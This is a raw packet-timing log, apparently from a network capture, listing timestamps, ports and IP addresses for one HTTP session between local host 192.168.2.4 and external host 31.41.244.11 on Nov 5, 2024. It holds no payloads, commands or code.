Nov 5, 2024 18:46:10.205373049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.205383062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.205414057 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.205436945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.206084013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.206095934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.206105947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.206129074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.206163883 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.206824064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.206835985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.206846952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.206868887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.206893921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.207062006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.207072973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.207082987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.207113981 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.207135916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.207751036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.207798004 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.207828999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.207876921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.207909107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.207918882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.207961082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.208681107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.208692074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.208702087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.208724022 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.208748102 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209243059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209252119 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209290981 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209317923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209328890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209347963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209358931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209361076 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209371090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209382057 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209388971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209414005 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209470987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209517956 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209547043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209557056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209594011 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209614038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209631920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209642887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209650040 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209666014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209680080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209685087 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209686041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209698915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209711075 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209732056 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209752083 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209784985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209794998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209805965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209816933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209827900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209830046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209840059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209855080 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209877968 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209882021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209889889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209893942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209903955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209914923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209925890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209933043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209933043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209954023 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209959984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209964037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209979057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.209985971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.209990978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210005999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210016012 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210016966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210036993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210058928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210058928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210072994 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210143089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210155010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210165977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210176945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210189104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210201025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210206985 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210231066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210236073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210241079 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210247040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210261106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210273027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210277081 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210283041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210294008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210298061 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210319996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210338116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210410118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210419893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210427046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210464001 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210484982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210504055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210515022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210525036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210526943 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210536957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210546970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210546970 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210561037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210580111 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210581064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210592031 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210603952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210604906 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210613012 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210642099 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210670948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210717916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210798979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210809946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210820913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210830927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210848093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210870028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210874081 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210880995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210890055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210901976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210905075 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210912943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210925102 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210938931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.210954905 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210973978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.210998058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211009026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211030006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211039066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211040020 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211050987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211061001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211062908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211081982 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211107016 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211132050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211143017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211158991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211179018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211179972 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211189985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211200953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211200953 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211211920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211229086 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211242914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211253881 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211256981 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211265087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211277008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211285114 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211314917 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211325884 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211354017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211370945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211407900 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211431026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211442947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211452961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211474895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211500883 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211661100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211673021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211683989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211711884 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211726904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211741924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211752892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211764097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211772919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211785078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211801052 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211868048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211879015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211890936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211895943 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211903095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211914062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211920023 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211951017 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.211982965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.211992979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.212003946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.212009907 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.212028980 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.212055922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.212061882 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.212065935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.212076902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.212089062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.212093115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.212105036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.212125063 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.251442909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.251528978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.251537085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.251542091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.251658916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.294017076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.294027090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.294038057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.294115067 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.300677061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.300685883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.300697088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.300712109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.300721884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.300743103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.300765038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.300765991 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.300776958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.300800085 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.300811052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.300832033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.300833941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.300846100 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.300870895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.300903082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.300913095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.300951958 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.301120043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301167011 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.301172018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301183939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301208019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.301229000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.301242113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301254988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301265955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301282883 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.301289082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.301314116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.301342010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301352024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301362038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301371098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301431894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.301465034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301470041 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.301476955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301486015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301496983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301507950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301513910 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.301518917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301527023 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.301552057 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.301637888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301649094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301656008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301691055 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.301707029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301712036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.301717997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301728010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301739931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301748037 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.301770926 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.301820040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301829100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301836014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301882029 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.301959038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301970005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301979065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.301990986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.302015066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.302026033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.302057028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.302067041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.302077055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.302089930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.302100897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.302105904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.302112103 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.302122116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.302124977 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.302134037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.302155018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.302170038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.302172899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.302196026 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.302202940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.302207947 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.302212954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.302238941 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.302246094 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.313822985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.313847065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.313853979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.313858986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.313863993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.313868046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.313874960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.313899994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.313936949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.313942909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.313951015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314059019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314222097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314232111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314249039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314260006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314270020 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314270020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314281940 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314285040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314296007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314308882 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314337015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314379930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314392090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314402103 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314413071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314428091 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314441919 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314449072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314483881 CET	80	49804	31.41.244.11	192.168.2.4
